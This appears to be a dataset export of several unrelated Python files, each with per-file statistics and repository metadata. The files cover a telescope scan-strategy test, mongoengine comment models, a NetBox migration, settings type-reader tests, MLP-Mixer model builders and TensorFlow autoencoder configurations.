np.testing.assert_almost_equal(spinmaps_old['s2a4']['maps'][5], spinmaps_new['s2a4']['maps'][5]) def test_scan_spole_hwp_mueller(self): ''' Perform a (low resolution) scan with a HWP mueller matrix specified and see if TOD make sense. ''' mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 polang = 20. ces_opts = dict(ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2.) scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create a 1 x 1 square grid of Gaussian beams. scs.create_focal_plane(nrow=1, ncol=1, fov=4, lmax=self.lmax, fwhm=fwhm, polang=polang) beam = scs.beams[0][0] hwp_mueller = np.asarray([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, -1]]) beam.hwp_mueller = hwp_mueller scs.init_detpair(self.alm, beam, nside_spin=nside, max_spin=mmax) scs.partition_mission() chunk = scs.chunks[0] ces_opts.update(chunk) # Populate boresight. scs.constant_el_scan(**ces_opts) # Turn on HWP scs.set_hwp_mod(mode='continuous', freq=1., start_ang=0) scs.rotate_hwp(**chunk) tod, pix, nside_out, pa, hwp_ang = scs.scan(beam, return_tod=True, return_point=True, **chunk) # Construct TOD manually. polang = beam.polang maps_sm = np.asarray(hp.alm2map(self.alm, nside, verbose=False, fwhm=np.radians(beam.fwhm / 60.))) np.testing.assert_almost_equal(maps_sm[0], scs.spinmaps['main_beam']['s0a0']['maps'][0]) q = np.real(scs.spinmaps['main_beam']['s2a4']['maps'][mmax + 2]) u = np.imag(scs.spinmaps['main_beam']['s2a4']['maps'][mmax + 2]) np.testing.assert_almost_equal(maps_sm[1], q) np.testing.assert_almost_equal(maps_sm[2], u) tod_man = maps_sm[0][pix] tod_man += (maps_sm[1][pix] \ * np.cos(2 * np.radians(pa - polang - 2 * hwp_ang))) tod_man += (maps_sm[2][pix] \ * np.sin(2 * np.radians(pa - polang - 2 * hwp_ang))) np.testing.assert_almost_equal(tod, tod_man) def test_scan_spole_bin_hwp_mueller(self): ''' Perform a (low resolution) scan, bin and compare to input. Now with hwp_mueller. ''' mlen = 10 * 60 rot_period = 120 mmax = 2 ra0=-10 dec0=-57.5 fwhm = 200 nside = 128 az_throw = 10 scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole') # Create a 1 x 2 square grid of Gaussian beams. scs.create_focal_plane(nrow=1, ncol=2, fov=4, lmax=self.lmax, fwhm=fwhm) # Add HWP Mueller matrix attribute to each beam. hwp_mueller = np.asarray([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, -1]]) for beami in scs.beams: beami[0].hwp_mueller = hwp_mueller beami[1].hwp_mueller = hwp_mueller # Allocate and assign parameters for mapmaking. scs.allocate_maps(nside=nside) # set instrument rotation. scs.set_instr_rot(period=rot_period, angles=[68, 113, 248, 293]) # Set elevation stepping. scs.set_el_steps(rot_period, steps=[0, 2, 4]) # Set HWP rotation. scs.set_hwp_mod(mode='continuous', freq=3.) # Generate timestreams, bin them and store as attributes. scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0, az_throw=az_throw, scan_speed=2., nside_spin=nside, max_spin=mmax) # Solve for the maps. maps, cond = scs.solve_for_map(fill=np.nan) alm = hp.smoothalm(self.alm, fwhm=np.radians(fwhm/60.), verbose=False) maps_raw = np.asarray(hp.alm2map(self.alm, nside, verbose=False)) cond[~np.isfinite(cond)] = 10 np.testing.assert_array_almost_equal(maps_raw[0,cond<2.5], maps[0,cond<2.5], decimal=10) np.testing.assert_array_almost_equal(maps_raw[1,cond<2.5], maps[1,cond<2.5], decimal=10) np.testing.assert_array_almost_equal(maps_raw[2,cond<2.5], maps[2,cond<2.5], decimal=10) if __name__ == '__main__': unittest.main()
36.022288
89
0.546653
6,262
48,486
4.063877
0.079208
0.006602
0.038903
0.027232
0.83429
0.819632
0.794286
0.770002
0.757388
0.742966
0
0.04156
0.34544
48,486
1,345
90
36.049071
0.76028
0.149755
0
0.72661
0
0
0.0176
0
0
0
0
0
0.145808
1
0.035237
false
0
0.008505
0
0.048603
0.00486
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
275979f219f542cf2e791f25b9ea58edfcff99cf
1,618
py
Python
models/comment.py
hnguyenworkstation/hoocons_backend
725461812a172ca0a88181e3399e6e2294953273
[ "MIT" ]
null
null
null
models/comment.py
hnguyenworkstation/hoocons_backend
725461812a172ca0a88181e3399e6e2294953273
[ "MIT" ]
null
null
null
models/comment.py
hnguyenworkstation/hoocons_backend
725461812a172ca0a88181e3399e6e2294953273
[ "MIT" ]
null
null
null
from datetime import * import mongoengine from static import app_constant from mongoengine import * class BaseReplyComment(EmbeddedDocument): # Created with base data create_by = ReferenceField('User', required=True) text_content = StringField(default="") image = StringField(default="") create_at = DateTimeField(default=datetime.utcnow()) liked_by = ListField(ReferenceField('User'), default=[]) is_edited = BooleanField(default=False) def get_complete_json(self): return { "created_by": self.created_by.get_simple_header(), "create_at": self.create_at, "text_content": self.text_content, "image": self.image, "likes_count": len(self.liked_by), "is_edited": self.is_edited } class BaseComment(EmbeddedDocument): # Created with base data create_by = ReferenceField('User', required=True) text_content = StringField(default="") image = StringField(default="") create_at = DateTimeField(default=datetime.utcnow()) liked_by = ListField(ReferenceField('User'), default=[]) is_edited = BooleanField(default=False) replies = ListField(EmbeddedDocumentField(BaseReplyComment), default=[]) def get_complete_json(self): return { "created_by": self.created_by.get_simple_header(), "create_at": self.create_at, "text_content": self.text_content, "image": self.image, "likes_count": len(self.liked_by), "is_edited": self.is_edited, "replies": len(self.replies) }
31.72549
76
0.653894
172
1,618
5.924419
0.27907
0.064769
0.052993
0.060844
0.802748
0.802748
0.802748
0.802748
0.802748
0.802748
0
0
0.23115
1,618
50
77
32.36
0.819132
0.027812
0
0.684211
0
0
0.086097
0
0
0
0
0
0
1
0.052632
false
0
0.105263
0.052632
0.605263
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
7
2762c9973cb9d66693a26a43ece8a7fd87d5a2c8
2,634
py
Python
netbox/ipam/migrations/0044_standardize_models.py
orphanedgamboa/netbox
5cdc38ec3adb5278480b267a6c8e674e9d3fca39
[ "Apache-2.0" ]
1
2022-02-18T03:00:08.000Z
2022-02-18T03:00:08.000Z
netbox/ipam/migrations/0044_standardize_models.py
emersonfelipesp/netbox
fecca5ad83fb6b48a2f15982dfd3242653f105f9
[ "Apache-2.0" ]
1
2021-08-23T15:38:47.000Z
2021-08-23T15:40:10.000Z
netbox/ipam/migrations/0044_standardize_models.py
emersonfelipesp/netbox
fecca5ad83fb6b48a2f15982dfd3242653f105f9
[ "Apache-2.0" ]
1
2018-12-05T12:03:21.000Z
2018-12-05T12:03:21.000Z
import django.core.serializers.json from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('ipam', '0043_add_tenancy_to_aggregates'), ] operations = [ migrations.AddField( model_name='rir', name='custom_field_data', field=models.JSONField(blank=True, default=dict, encoder=django.core.serializers.json.DjangoJSONEncoder), ), migrations.AddField( model_name='role', name='custom_field_data', field=models.JSONField(blank=True, default=dict, encoder=django.core.serializers.json.DjangoJSONEncoder), ), migrations.AddField( model_name='vlangroup', name='custom_field_data', field=models.JSONField(blank=True, default=dict, encoder=django.core.serializers.json.DjangoJSONEncoder), ), migrations.AlterField( model_name='aggregate', name='id', field=models.BigAutoField(primary_key=True, serialize=False), ), migrations.AlterField( model_name='ipaddress', name='id', field=models.BigAutoField(primary_key=True, serialize=False), ), migrations.AlterField( model_name='prefix', name='id', field=models.BigAutoField(primary_key=True, serialize=False), ), migrations.AlterField( model_name='rir', name='id', field=models.BigAutoField(primary_key=True, serialize=False), ), migrations.AlterField( model_name='role', name='id', field=models.BigAutoField(primary_key=True, serialize=False), ), migrations.AlterField( model_name='routetarget', name='id', field=models.BigAutoField(primary_key=True, serialize=False), ), migrations.AlterField( model_name='service', name='id', field=models.BigAutoField(primary_key=True, serialize=False), ), migrations.AlterField( model_name='vlan', name='id', field=models.BigAutoField(primary_key=True, serialize=False), ), migrations.AlterField( model_name='vlangroup', name='id', field=models.BigAutoField(primary_key=True, serialize=False), ), migrations.AlterField( model_name='vrf', name='id', field=models.BigAutoField(primary_key=True, serialize=False), ), ]
33.769231
117
0.580486
239
2,634
6.259414
0.205021
0.078209
0.167112
0.19385
0.81484
0.81484
0.81484
0.81484
0.81484
0.81484
0
0.002186
0.305239
2,634
77
118
34.207792
0.815301
0
0
0.794521
0
0
0.070615
0.01139
0
0
0
0
0
1
0
false
0
0.027397
0
0.068493
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
278cb08cfff66333b600950dd0e23594fef0a259
1,934
py
Python
tests/test_read_types.py
OrangutanGaming/django-enhanced-settings
87f4a840953e4bcdc85af96ee4b6baf2df6043a3
[ "MIT" ]
null
null
null
tests/test_read_types.py
OrangutanGaming/django-enhanced-settings
87f4a840953e4bcdc85af96ee4b6baf2df6043a3
[ "MIT" ]
null
null
null
tests/test_read_types.py
OrangutanGaming/django-enhanced-settings
87f4a840953e4bcdc85af96ee4b6baf2df6043a3
[ "MIT" ]
null
null
null
import pytest from django_enhanced_settings import read_types def test_read_str(): assert read_types.read_str('abc') == 'abc' with pytest.raises(ValueError, match=r".+ str"): read_types.read_str(123) assert read_types.read_str('123') == '123' with pytest.raises(ValueError, match=r".+ str"): read_types.read_str(['123']) with pytest.raises(ValueError, match=r".+ str"): read_types.read_str(None) def test_read_bool(): assert read_types.read_bool(True) is True assert read_types.read_bool(False) is False assert read_types.read_bool(0) is False assert read_types.read_bool(1) is True assert read_types.read_bool('f') is False assert read_types.read_bool('t') is True with pytest.raises(ValueError, match=r".+ bool"): read_types.read_bool(2) with pytest.raises(ValueError, match=r".+ bool"): read_types.read_bool(-1) with pytest.raises(ValueError, match=r".+ bool"): read_types.read_bool(None) def test_read_list(): assert read_types.read_list(['1', '2', '3']) == ['1', '2', '3'] assert read_types.read_list([1, 2, 3]) == [1, 2, 3] with pytest.raises(ValueError, match=r".+ list"): read_types.read_list(2) assert read_types.read_list([]) == [] with pytest.raises(ValueError, match=r".+ list"): read_types.read_list('123') with pytest.raises(ValueError, match=r".+ list"): read_types.read_list('1;') with pytest.raises(ValueError, match=r".+ list"): read_types.read_list(';', ';') with pytest.raises(ValueError, match=r".+ list"): read_types.read_list(';1', ';') assert read_types.read_list('1;', ';') == ['1'] assert read_types.read_list('1;2', ';') == ['1', '2'] assert read_types.read_list('a;2;c', ';') == ['a', '2', 'c'] assert read_types.read_list('1,b,3', ',') == ['1', 'b', '3'] assert read_types.read_list(';', ',') == [';']
37.921569
67
0.6303
284
1,934
4.070423
0.119718
0.217993
0.303633
0.262976
0.878028
0.816609
0.74827
0.573529
0.573529
0.573529
0
0.029114
0.18304
1,934
50
68
38.68
0.702532
0
0
0.255814
0
0
0.071355
0
0
0
0
0
0.372093
1
0.069767
true
0
0.046512
0
0.116279
0
0
0
0
null
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
7
7e01a06a565514f55020329deca6542ae8483479
1,965
py
Python
mlp_mixer/models.py
isaaccorley/mlp-mixer-pytorch
c890e9fe5eabf38049c4e5a998d4cb3902a02a62
[ "MIT" ]
30
2021-05-05T06:25:32.000Z
2022-02-01T11:08:18.000Z
mlp_mixer/models.py
isaaccorley/mlp-mixer-pytorch
c890e9fe5eabf38049c4e5a998d4cb3902a02a62
[ "MIT" ]
2
2021-05-06T14:41:56.000Z
2021-05-28T18:27:59.000Z
mlp_mixer/models.py
isaaccorley/mlp-mixer-pytorch
c890e9fe5eabf38049c4e5a998d4cb3902a02a62
[ "MIT" ]
5
2021-06-07T11:56:26.000Z
2022-02-01T11:08:19.000Z
from mlp_mixer import MLPMixer def mlp_mixer_s16(num_classes: int, image_size: int = 224, channels: int = 3): params = dict(patch_size=16, num_layers=8, hidden_dim=512, tokens_hidden_dim=256, channels_hidden_dim=2048) return MLPMixer(num_classes, image_size, channels, **params) def mlp_mixer_s32(num_classes: int, image_size: int = 224, channels: int = 3): params = dict(patch_size=32, num_layers=8, hidden_dim=512, tokens_hidden_dim=256, channels_hidden_dim=2048) return MLPMixer(num_classes, image_size, channels, **params) def mlp_mixer_b16(num_classes: int, image_size: int = 224, channels: int = 3): params = dict(patch_size=16, num_layers=12, hidden_dim=768, tokens_hidden_dim=384, channels_hidden_dim=3072) return MLPMixer(num_classes, image_size, channels, **params) def mlp_mixer_b32(num_classes: int, image_size: int = 224, channels: int = 3): params = dict(patch_size=32, num_layers=12, hidden_dim=768, tokens_hidden_dim=384, channels_hidden_dim=3072) return MLPMixer(num_classes, image_size, channels, **params) def mlp_mixer_l16(num_classes: int, image_size: int = 224, channels: int = 3): params = dict(patch_size=16, num_layers=24, hidden_dim=1024, tokens_hidden_dim=512, channels_hidden_dim=4096) return MLPMixer(num_classes, image_size, channels, **params) def mlp_mixer_l32(num_classes: int, image_size: int = 224, channels: int = 3): params = dict(patch_size=32, num_layers=24, hidden_dim=1024, tokens_hidden_dim=512, channels_hidden_dim=4096) return MLPMixer(num_classes, image_size, channels, **params) def mlp_mixer_h14(num_classes: int, image_size: int = 224, channels: int = 3): params = dict(patch_size=14, num_layers=32, hidden_dim=1280, tokens_hidden_dim=640, channels_hidden_dim=5120) return MLPMixer(num_classes, image_size, channels, **params)
51.710526
78
0.716031
292
1,965
4.503425
0.157534
0.143726
0.058555
0.095817
0.906464
0.906464
0.906464
0.906464
0.870722
0.870722
0
0.087578
0.180662
1,965
37
79
53.108108
0.729193
0
0
0.448276
0
0
0
0
0
0
0
0
0
1
0.241379
false
0
0.034483
0
0.517241
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
8
fd7f2dc3426246287bad4f40d8250630824d045f
95
py
Python
DST_als/utils/get_root_path.py
cyberfish1120/DST_als
7ec706cf93b8e99b5c85259a1a4e434faada1fce
[ "Apache-2.0" ]
null
null
null
DST_als/utils/get_root_path.py
cyberfish1120/DST_als
7ec706cf93b8e99b5c85259a1a4e434faada1fce
[ "Apache-2.0" ]
null
null
null
DST_als/utils/get_root_path.py
cyberfish1120/DST_als
7ec706cf93b8e99b5c85259a1a4e434faada1fce
[ "Apache-2.0" ]
null
null
null
import os def get_root_path(): return os.path.dirname(__file__).split('DST_als/utils')[0]
19
62
0.726316
16
95
3.875
0.875
0
0
0
0
0
0
0
0
0
0
0.011905
0.115789
95
4
63
23.75
0.72619
0
0
0
0
0
0.136842
0
0
0
0
0
0
1
0.333333
true
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
1
1
0
0
7
fde463ee3dda763dd624ff213e5ebc0003beed53
84
py
Python
tests/test_factory.py
conrad-evans/sports_betting_api
baa80df5608c1cc244f51be86ba29eaabd8f031e
[ "MIT" ]
null
null
null
tests/test_factory.py
conrad-evans/sports_betting_api
baa80df5608c1cc244f51be86ba29eaabd8f031e
[ "MIT" ]
null
null
null
tests/test_factory.py
conrad-evans/sports_betting_api
baa80df5608c1cc244f51be86ba29eaabd8f031e
[ "MIT" ]
null
null
null
from src import create_app def test_config(): assert not create_app().testing
14
35
0.75
13
84
4.615385
0.846154
0.3
0
0
0
0
0
0
0
0
0
0
0.178571
84
5
36
16.8
0.869565
0
0
0
0
0
0
0
0
0
0
0
0.333333
1
0.333333
true
0
0.333333
0
0.666667
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
7
e33a5de43caed5fe0e8d1ecae8326b695e7fd562
88
py
Python
file_validator/reader/__init__.py
sujavarghese/data-validator
e0c5d94da797cb43b17d6ee193d337cbcb602f49
[ "MIT" ]
null
null
null
file_validator/reader/__init__.py
sujavarghese/data-validator
e0c5d94da797cb43b17d6ee193d337cbcb602f49
[ "MIT" ]
null
null
null
file_validator/reader/__init__.py
sujavarghese/data-validator
e0c5d94da797cb43b17d6ee193d337cbcb602f49
[ "MIT" ]
null
null
null
from file_validator.reader.reader import * from file_validator.reader.messages import *
29.333333
44
0.840909
12
88
6
0.5
0.222222
0.472222
0.638889
0
0
0
0
0
0
0
0
0.090909
88
2
45
44
0.9
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
7
e3722f17eaa9f5df4575252cda8b370a7d1803f8
1,364
py
Python
dnnae/configs/configs.py
myinxd/dnnae-gmm
e1c59e2e93772a36797812169cae119ac00184c5
[ "MIT" ]
4
2018-03-29T12:00:22.000Z
2020-03-06T17:30:46.000Z
dnnae/configs/configs.py
myinxd/dnnae-gmm
e1c59e2e93772a36797812169cae119ac00184c5
[ "MIT" ]
null
null
null
dnnae/configs/configs.py
myinxd/dnnae-gmm
e1c59e2e93772a36797812169cae119ac00184c5
[ "MIT" ]
null
null
null
# Copyright (C) 2018 Zhixian MA <zx@mazhixian.me> # MIT liscence """Configurations for the DNNAE network.""" import tensorflow as tf class config_mnist_bn(object): rs = 28 inputs = tf.placeholder(dtype=tf.float32, shape=(None,rs**2), name='x_in') outputs = tf.placeholder(dtype=tf.float32, shape=(None,rs**2), name='x_out') numclass = 10 labels = tf.placeholder(dtype=tf.float32, shape=(None,numclass), name='labels') ae_flag = True share_flag = False keep_prob = tf.placeholder(dtype=tf.float32, shape=[], name='keep_prob') layers = [256, 128, 32] actfun = [tf.nn.relu, tf.nn.relu, tf.nn.relu] batchflag = [True, True, False] class config_mnist_do(object): rs = 28 inputs = tf.placeholder(dtype=tf.float32, shape=(None,rs**2), name='x_in') outputs = tf.placeholder(dtype=tf.float32, shape=(None,rs**2), name='x_out') numclass = 10 labels = tf.placeholder(dtype=tf.float32, shape=(None,numclass), name='labels') ae_flag = True share_flag = False keep_prob = tf.placeholder(dtype=tf.float32, shape=[], name='keep_prob') layers = [256, 128, 32] actfun = [tf.nn.relu, tf.nn.relu, tf.nn.relu] batchflag = [False, False, False] class config_train(object): valrate = 0.2 batchsize = 100 epochs = 100 lr_init = 0.0001 decay_rate = 0.95 keep_prob = 0.5
31.72093
83
0.658358
204
1,364
4.303922
0.343137
0.118451
0.164009
0.182232
0.71754
0.71754
0.71754
0.71754
0.71754
0.71754
0
0.059567
0.187683
1,364
42
84
32.47619
0.732852
0.072581
0
0.625
0
0
0.038156
0
0
0
0
0
0
1
0
false
0
0.03125
0
1
0
0
0
0
null
0
0
1
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
7